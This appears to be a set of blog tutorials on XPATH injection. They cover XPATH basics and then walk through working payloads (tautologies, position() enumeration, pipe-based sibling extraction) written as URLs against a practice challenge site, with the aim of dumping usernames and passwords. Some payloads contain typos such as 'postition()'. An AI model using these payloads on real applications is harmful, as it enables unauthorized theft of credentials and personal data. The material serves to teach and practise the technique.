XPATH tut

1. XPATH Injection : Iterating through element and Entities
2.  
3. Long time after posting the basics of XPATH for XPATH Injection, here we are with the first part of XPATH injection. I wont take much time in this one as i suppose if you have read the other tutorials on XPATH Here. In this tutorial we will learn how to inject into XPATH vuln URL with Zero knowledge of the file structure.
4.  
5. We are going to discuss the following in this tutorial.
6. 1. Testing and confirming XPATHi
7. 2. Iterating through the Nodes
8. 3. Extracting Data from Siblings
9.  
10. First of all i hope you know the basics of what XPATH is, structure of a XML file, quries used to extract data from XML using XPATH. If you dont then i am sure you ll get "Very Confused" with this tutorial.
11.  
12.  
13. So before you start reading this i suppose you read other tutorials on XPATH.
14.  
15. 1. Testing and confirming XPATHi
16.  
17. Testing for XPATH and confirming it is the most important part as most of us and specially the readers of securityidiots see SQLi everywhere and anywhere they find an error even if the error is Conversional Error, Internal Error, Programming Error and even some times people assume that getting blocked by WAF on typing "Union select" means its vulnerable to SQLi. Hmmm interesting and there reaction is like :
18.  
19.  
20. Well guys i suppose i have written enough tutorial on how to test and confirm SQLi, sometimes its good to read them also. Keeping that apart here we are going to start testing for XPATH.
21.  
22. When we see an input feild the first thing we ll check is making it true using the below tests:
23. 1 or 1=1
24. 1 or true
25. ' or ''='
26. " or ""="
27. and in case of XPATH or SQLi and many other Injections they will work same. So now to confirm if its XPATHi we can use position() function, which is specific to XPATH. Here are few tests we can try:
28. 1 or postition()=1 or 1=1
29. 1 or postition()=1 or true
30. ' or postition()=1 or ''='
31. " or postition()=1 or ""="
32. If any of the above works then you can assume that the injection you are dealing with is a XPATH Injection. Now below is an example XML file which we ll be using throughout this tutorial:
33.  
34. <xmlfile>
35. <users>
36. <user>
37. <name first="Zenodermus" last="Javanicus"/>
38. <id>1</id>
39. <username>Zen</username>
40. <password>n00b_132</password>
41. <phone>123-456-7890</phone>
42. </user>
43. <user>
44. <name first="Rahul" last="Maane"/>
45. <id>2</id>
46. <username>Monster</username>
47. <password>i_om-GAWWWD</password>
48. <phone>603-478-4115</phone>
49. </user>
50. <user>
51. <name first="Ashx" last="Khan"/>
52. <id>3</id>
53. <username>Trojan</username>
54. <password>ihavemoregfsthanyou</password>
55. <phone>222-222-2222</phone>
56. </user>
57. <user>
58. <name first="Rummy" last="Khan"/>
59. <id>4</id>
60. <username>CyberGh0st</username>
61. <password>SelectPassFromDual</password>
62. <phone>88-777-8989</phone>
63. </user>
64. </users>
65. </xmlfile>
66.  
67. Now here are some basic XPATH queries which can be used to extract data from the above file:
68. To Extract username where id=1
69. /xmlfile/users/user[id='1']/username
70. To Extract username where id=2
71. /xmlfile/users/user[id='2']/username
72. To Extract password where username is Monster
73. /xmlfile/users/user[username="Monster"]/password
74. To Extract phone where username is Trojan and password is ihavemoregfsthanyou
75. /xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone
76. To Extract the first username
77. /xmlfile/users/user[position()=1]/username
78.  
79. Looking at all the above example queries i think it must be clear enough for all of you to understand the basic way of extracting data using XPATH queries.
80.  
81. Now lets take this example "Link" which shows the phone number of the user passed in the username parameter. Now we can only get the number if we know the username.
82.  
83. 2. Iterating through the Nodes
84.  
85. So here lets try injecting it with XPATH. Before we start injecting lets assume what could be the query working inside, it should be something like "/root/semething/user[username="<Our_Intput_here>"]/phone" assuming this lets try the below injections:
86. http://leettime.net/zen_challenge1/challenge_2.php?username='or''='
87. And we got the number of first user, now to get the number of second user we ll use position() as i used before above
88. http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=2 and''='
89. And we got the number of Second user, so on we can keep changing position() to get the rest of users phone numbers.
90. http://leettime.net/zen_challenge1/challenge_2.php?username='or position()=3 and''='
91. And we got the number of Third user, so on we can keep changing position() to get the rest of users phone numbers.
92. Here we are done iterating through the nodes but the problem is we are not able to extract the other details like passwords etc. Which should and must be saved in the same XML file. Now here comes the next step using which we can even enumerate any other details we want.
93.  
94. 3. Extracting Data from Siblings
95.  
96. Till now we were using position so we are able to enumerate through the nodes only but /phone in the end is hard coded so we cant change it to extract other data. But worry not!! we have the Pipe operator which works to combine two queries in XPATH. Here is how we can do this:
97. http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
98. The above Injection extracts the Second Element from first node.
99. http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
100. The above Injection extracts the Third Element from first node.
101. http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
102. The above Injection extracts the Forth Element from first node.
103. http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
104. The above Injection extracts the Fifth Element from first node.
105. http://leettime.net/zen_challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
106. Here i changed the position which means it will extract data from the second node second element, so on you can keep changing and extracting.
107. Using this we can extract data with Zero Knowledge of the internal file structure. Here is a XPATHi challenge you can try solving the above method:
108. http://leettime.net/index.php
109. Here try extracting the username and password of all the users. Thats all for this tutorial, will catch you back soon with another tutorial.
110.  
111.  
112. Basics XPATH Injection
113.  
114. Starting on the name of My god "Allah" the most beneficent the most merciful
115.  
116. In this tutorial we will discuss the basic of XPATH injection and learn the basics of injecting into XPATH queries. XPATH queries are too much like SQL queries also. And the rules of injecting into XPATH are also same to SQL queries. You have to take care of the closing the input with single or double quote and then commenting if required. For more understanding i will be using a XML file to explain all the examples in this tutorial, you can also use Leettime to practice
117. <userdb>
118. <user>
119. <name first="Jeff" last="Smiley"/>
120. <id>1</id>
121. <username>Jefferson</username>
122. <password>Jutobi</password>
123. <phone>123-456-7890</phone>
124. </user>
125. <user>
126. <name first="Chunk" last="MacRunfast"/>
127. <id>2</id>
128. <username>Alexandra</username>
129. <password>securityidiots</password>
130. <phone>603-478-4115</phone>
131. </user>
132. <user>
133. <name first="Zenodermus" last="Javanicus"/>
134. <id>3</id>
135. <username>Zen</username>
136. <password>@lltogether</password>
137. <phone>222-222-2222</phone>
138. </user>
139. </userdb>
140.  
141. As I know most of the readers who are reading here must be having some basic information of SQL queries, so rather than starting from XPATH i ll show you how can you simply relate or convert a SQL query into XPATH query. Below is a basic SQL query where we are extracting the username from a table users under database userdb using the condition on id.
142. select username from userdb.user where id=1
143.  
144. Now lets convert the above query into a XPATH query and see the difference.
145. /userdb/user[id='1']/username
146. The above query will extract the username of the user whose id is 1 which is "Jefferson" in the XML File
147.  
148. As you can see in the above query we first specified the path and then the condition and then what we want to extract, yeah its as simple as that. Now i hope you can understand the basic XPATH query. So now lets inject the above query to enumerate the usernames of each user one by one assuming the we do not know the user id for each user and we want to check the usernames of all the users then we can use the position() function. Here is an example of position function.
149. /userdb/user[position()=1]/username
150. Will extract the first username which is "Jefferson"
151.  
152. /userdb/user[position()=2]/username
153. Will extract the first username which is "Alaxandra"
154.  
155. /userdb/user[position()=3]/username
156. Will extract the first username which is "Zen"
157.  
158. Now lets take the query which we used before and inject it using the position function.
159. /userdb/user[id='ourinputhere']/username
160. Lets say our input it ' or position()=1 or ' the the query will become
161. /userdb/user[id='' or position()=1 or '']/username
162. Will extract the first username which is "Jefferson"
163.  
164. which means the condition says either id should be empty or get the first user's username, and we will get the first username. But this injection do not allow us to enumerate other details such as the other columns in SQL or in XPATH we can say the other siblings. So how to get the other siblings because that '/username' in the end of query makes our query to extract only the usernames.
165.  
166. Here we a bypass for that which is the pipe character, also known as union select operater for XPATH. A pipe operater can be used to concatenate two different statements, So what will do is using Pipe we will separate the /username part into the next statement and no matter any output come of not from the second statement, still XPATH will give us the output from the first statement. This means what we need to concentrate on is to only keep our first statement valid. So we can make our query something like this.
167. /userdb/user[id='ourinputhere']/username
168. Lets say our input it ' or position()=1]/New_Element_name|a[' the the query will become
169. /userdb/user[id='' or position()=1]/New_Element_name|a['']/username
170.  
171. Now for example we want to extract the password of a user using the above injection then we just have to put the name of password column on place of element which will give us the below results:
172. /userdb/user[id='ourinputhere']/username
173. Lets say our input it ' or position()=1]/password|a[' the the query will become
174. /userdb/user[id='' or position()=1]/password|a['']/username
175. Will extract the first user's password which is "Jutobi"
176.  
177. It will successfully give us the passwords but right now we simply assumed that the password column name is password, which was just an assumption. But what if the column name for passwords is like 'my_pass' then we wont be able to extract it. Here we can use an another trick, if you read the Selecting Unknown Nodes carefully then you may know what we can do. We can use * to select an unknown Node or Element, and we have to specify which element we want. Just see the below example carefully:
178. /userdb/user[id='ourinputhere']/username
179. Lets say our input it ' or position()=1]/*[1]|a[' the the query will become
180. /userdb/user[id='' or position()=1]/*[1]|a['']/username
181. It wont Extract anything as the elements are Attributes not Element values
182. /userdb/user[id='' or position()=1]/*[2]|a['']/username
183. It will get the Second element for first user which is '1'.
184. /userdb/user[id='' or position()=1]/*[3]|a['']/username
185. It will get the third element for first user which is "Jefferson".
186. /userdb/user[id='' or position()=1]/*[4]|a['']/username
187. It will get the forth element for first user which is "Jutobi".
188. /userdb/user[id='' or position()=1]/*[5]|a['']/username
189. It will get the fifth element for first user which is "123-456-7890".
190.  
191. The red part in query is our injection. In this manner we can enumerate all the siblings for the first element now lets change the position() to enumerate all the values of the second user.
192. /userdb/user[id='ourinputhere']/username
193. Lets say our input it ' or position()=2]/*[1]|a[' the the query will become
194. /userdb/user[id='' or position()=2]/*[1]|a['']/username
195. It wont Extract anything as the elements are Attributes not Element values
196. /userdb/user[id='' or position()=2]/*[2]|a['']/username
197. It will get the Second element for first user which is '2'.
198. /userdb/user[id='' or position()=2]/*[3]|a['']/username
199. It will get the third element for first user which is "Alexandra".
200. /userdb/user[id='' or position()=2]/*[4]|a['']/username
201. It will get the forth element for first user which is "securityidiots".
202. /userdb/user[id='' or position()=2]/*[5]|a['']/username
203. It will get the fifth element for first user which is "603-478-4115".
204.  
205. In the same manner we can extract the details for the third user also. I hope you enjoyed reading. Leave your valueable comments and feedback please.
206.  
207.  
208. Basics of XPATH for XPATH Injection 2
209.  
210. Starting on the name of My god "Allah" the most beneficent the most merciful
211.  
212. This is the second part of basics for XPATH Injection, in this tutorial we will learn the basic queries of XPATH.
213.  
214. Headings in this Document:
215. Selecting Nodes In XPATH
216. The Basic XPATH Expressions
217. Predicates In XPATH
218. Selecting Unknown Paths
219. Selecting Several Paths
220. Introduction to Injection in XPATH Query
221.  
222. Again we will take some reference from W3s then after we understand the basic queries we will learn how to inject them.
223.  
224. The XML Example Document
225. We will use the following XML document in the examples below.
226. <?xml version="1.0" encoding="UTF-8"?>
227.  
228. <bookstore>
229.  
230. <book>
231. <title lang="eng">Harry Potter</title>
232. <price>76.99</price>
233. </book>
234.  
235. <book>
236. <title lang="eng">Learning XML</title>
237. <price>22.95</price>
238. </book>
239.  
240. <book>
241. <title lang="eng">Learning XPATH</title>
242. <price>30.20</price>
243. </book>
244.  
245. <book>
246. <title lang="eng">Learning Secrets of Injections</title>
247. <price>50.99</price>
248. </book>
249.  
250. <book>
251. <title lang="eng">Learning Programming</title>
252. <price>53.45</price>
253. </book>
254.  
255. </bookstore>
256.  
257.  
258. Selecting Nodes
259.  
260. XPath uses path expressions to select nodes in an XML document. The node is selected by following a path or steps. The most useful path expressions are listed below:
261.  
262. Expression Description
263. nodename : Selects all nodes with the name "nodename"
264. / : Selects from the root node
265. // : Selects nodes in the document from the current node that match the selection no matter where they are
266. . : Selects the current node
267. .. : Selects the parent of the current node
268. @ : Selects attributes
269.  
270.  
271. Some Basic XPATH Expression
272.  
273. In the table below we have listed some path expressions and the result of the expressions:
274.  
275. Path Expression Result
276. bookstore : Selects all nodes with the name "bookstore"
277. /bookstore : Selects the root element bookstore
278. Note: If the path starts with a slash ( / ) it always represents an absolute path to an element!
279. bookstore/book : Selects all book elements that are children of bookstore
280. //book : Selects all book elements no matter where they are in the document
281. bookstore//book : Selects all book elements that are descendant of the bookstore element, no matter where they are under the bookstore element
282. //@lang : Selects all attributes that are named lang
283.  
284.  
285. Predicates
286.  
287. Predicates are used to find a specific node or a node that contains a specific value.
288.  
289. Predicates are always embedded in square brackets.
290.  
291. In the table below we have listed some path expressions with predicates and the result of the expressions:
292.  
293. Path Expression Result
294. /bookstore/book[1] : Selects the first book element that is the child of the bookstore element.
295. /bookstore/book[last()] : Selects the LAST BOOK element that is the child of the bookstore element
296. /bookstore/book[last()-1] : Selects all the book elements except the last one that are children of the bookstore element
297. /bookstore/book[position()<3] : Selects the first two book elements that are children of the bookstore element
298. //title[@lang] : Selects all the title elements that have an attribute named lang
299. //title[@lang='eng'] : Selects all the title elements that have an attribute named lang with a value of 'eng'
300. /bookstore/book[price>35.00] : Selects all the book elements of the bookstore element that have a price element with a value greater than 35.00
301. /bookstore/book[price>35.00]/title : Selects all the title elements of the book elements of the bookstore element that have a price element with a value greater than 35.00
302.  
303.  
304. Selecting Unknown Nodes
305.  
306. XPath wildcards can be used to select unknown XML elements.
307.  
308. Wildcard Description
309. * Matches any element node
310. @* Matches any attribute node
311. node() Matches any node of any kind
312.  
313.  
314. In the table below we have listed some path expressions and the result of the expressions:
315.  
316. Path Expression Result
317. /bookstore/* Selects all the child nodes of the bookstore element
318. //* Selects all elements in the document
319. //title[@*] Selects all title elements which have any attribute
320.  
321.  
322. Selecting Several Paths
323. By using the | operator in an XPath expression you can select several paths.
324.  
325. In the table below we have listed some path expressions and the result of the expressions:
326.  
327. Path Expression Result
328. //book/title | //book/price Selects all the title AND price elements of all book elements
329. //title | //price Selects all the title AND price elements in the document
330. /bookstore/book/title | //price Selects all the title elements of the book element of the bookstore element AND all the price elements in the document
331.  
332.  
333.  
334. Basics of XPATH for XPATH Injection 1
335.  
336. Starting on the name of My god "Allah" the most beneficent the most merciful "XPATH Injection" If you landed this page searching for "SQLi Error based XPATH Injection" which is already posted at XPATH using UpdateXML and XPATH using ExtractValue and obviously this time we will not be discussing on SQL Injection. We are doing the discuss about the real XPATH injection, as we know XPATH is a data manipulation language very much similar to SQL. Using XPATH queries we can enumerate data saved into an XML file. Something which makes both of them different is that unlike SQL, in XPATH we do not have any Access Level which means that one a document is injectable the hackers get his hand on the whole database.
337.  
338. XPATH is used to create quries which allow user to manipulate data inside a XML document. In this tutorial we will start with the basics of XPATH queries to understand them better and later on we will move on the injecting part.
339.  
340. Below is a little introduction to XPATH from w3school to understand the terminology used in XPATH Data Manipulation Language. Just like we need to know what is database, tables, columns, data, queries etc if we want to learn SQL injection, in the same manner we need to understand the basic structures of XML to Inject into XPATH queries
341.  
342. In XPath, there are seven kinds of nodes: element, attribute, text, namespace, processing-instruction, comment, and document nodes.
343.  
344. XML documents are treated as trees of nodes. The topmost element of the tree is called the root element.
345.  
346. Look at the following XML document:
347.  
348. <?xml version="1.0" encoding="UTF-8"?>
349.  
350. <bookstore>
351. <book>
352. <title lang="en">Harry Potter</title>
353. <author>J K. Rowling</author>
354. <year>2005</year>
355. <price>29.99</price>
356. </book>
357. </bookstore>
358. Example of nodes in the XML document above:
359. (root element node)
360. J K. Rowling (element node)
361. lang="en" (attribute node)
362. Atomic values
363.  
364. Atomic values are nodes with no children or parent.
365.  
366. Example of atomic values:
367. J K. Rowling
368.  
369. "en"
370.  
371. Items
372.  
373. Items are atomic values or nodes.
374.  
375. Relationship of Nodes
376.  
377. Parent
378.  
379. Each element and attribute has one parent.
380.  
381. In the following example; the book element is the parent of the title, author, year, and price:
382.  
383. <book>
384. <title>Harry Potter</title>
385. <author>J K. Rowling</author>
386. <year>2005</year>
387. <price>29.99</price>
388. </book>
389. Children
390.  
391. Element nodes may have zero, one or more children.
392.  
393. In the following example; the title, author, year, and price elements are all children of the book element:
394.  
395. <book>
396. <title>Harry Potter</title>
397. <author>J K. Rowling</author>
398. <year>2005</year>
399. <price>29.99</price>
400. </book>
401. Siblings
402.  
403. Nodes that have the same parent.
404.  
405. In the following example; the title, author, year, and price elements are all siblings:
406.  
407. <book>
408. <title>Harry Potter</title>
409. <author>J K. Rowling</author>
410. <year>2005</year>
411. <price>29.99</price>
412. </book>
413. Ancestors
414. A node's parent, parent's parent, etc.
415. In the following example; the ancestors of the title element are the book element and the bookstore element:
416.  
417. <bookstore>
418.  
419. <book>
420. <title>Harry Potter</title>
421. <author>J K. Rowling</author>
422. <year>2005</year>
423. <price>29.99</price>
424. </book>
425.  
426. </bookstore>
427. Descendants
428.  
429. A node's children, children's children, etc.
430.  
431. In the following example; descendants of the bookstore element are the book, title, author, year, and price elements:
432.  
433. <bookstore>
434.  
435. <book>
436. <title>Harry Potter</title>
437. <author>J K. Rowling</author>
438. <year>2005</year>
439. <price>29.99</price>
440. </book>
441.  
442. </bookstore>
443.  
444.  
445.  
446. Introduction to Injection in XPATH Query
447.  
448. Okay if you read the above content then let us for example take a page which takes some input as name and shows the phone number of that user if that user exist in XML file. When injecting we know that for a string type either single quote or double quoute will be used that we can check by using ' " or ""=" ' for double quote and we can use ' ' or ''=' ' for single quote check okay so which ever works we will come to know that it is used intenally into the query now lets just assume a simple query.
449.  
450. /root/parent/something[username='our_input_here']/user
451.  
452. So the username are extracted after the condition gets the username as input. Now we know that if we make the condition true using ' or ''=' we will be able to see the first users details. But then we want to enumerate with each user one by one. as we know the position() function choose each node one by one. So we can use it to enumerate each user one by one. Here we go.
453.  
454. /root/parent/something[username='' or position()=1 or '']/user
455. /root/parent/something[username='' or position()=2 or '']/user
456. /root/parent/something[username='' or position()=3 or '']/user
457. /root/parent/something[username='' or position()=4 or '']/user
458. /root/parent/something[username='' or position()=5 or '']/user
459.  
460. This is how we can enumerate each user one by one.
461.  
462. I hope you learnt the basics of XPATH and XPATH injection. In next tutorial i will be explaining XPATH injection in more details and some much more better ways of Injecting in XPATH Queries.